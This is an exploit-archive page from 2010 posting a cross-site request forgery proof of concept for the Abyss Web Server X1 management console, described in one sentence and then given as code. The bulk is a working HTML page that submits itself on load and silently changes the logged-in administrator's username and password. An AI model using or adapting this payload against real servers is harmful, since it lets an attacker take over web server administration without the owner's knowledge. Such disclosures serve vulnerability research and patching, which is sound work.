Home / os / win7

Abyss Web Server X1 XSRF

Posted on 17 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Abyss Web Server X1 XSRF</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================
Abyss Web Server X1 XSRF
========================

Abyss Web Server X1
XSRF&lt;http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html&gt;
A cross-site request forgery vunlerability in the Abyss Web Server
X1&lt;http://www.aprelium.com/abyssws/download.php&gt; management
console can be exploited to change both the username and password of the
logged in user.
PoC:
 view plain&lt;http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#&gt;
print&lt;http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#&gt;
?&lt;http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#&gt;
 
   1. &lt;html&gt;
   2.     &lt;body onload=&quot;document.forms[0].submit()&quot;&gt;
   3.         &lt;form method=&quot;post&quot; action=&quot;
   http://localhost:9999/console/credentials&quot;&gt;
   4.             &lt;input type=&quot;hidden&quot; name=&quot;/console/credentials/login&quot;
   5.                    value=&quot;new_username&quot; /&gt;
   6.             &lt;input type=&quot;hidden&quot; name=
   &quot;/console/credentials/password/$pass1&quot;
   7.                    value=&quot;new_password&quot; /&gt;
   8.             &lt;input type=&quot;hidden&quot; name=
   &quot;/console/credentials/password/$pass2&quot;
   9.                    value=&quot;new_password&quot; /&gt;
   10.             &lt;input type=&quot;hidden&quot; name=&quot;/console/credentials/bok&quot;
   11.                    value=&quot;%C2%A0%C2%A0OK%C2%A0%C2%A0&quot; /&gt;
   12.         &lt;/form&gt;
   13.     &lt;/body&gt;
   14. &lt;/html&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :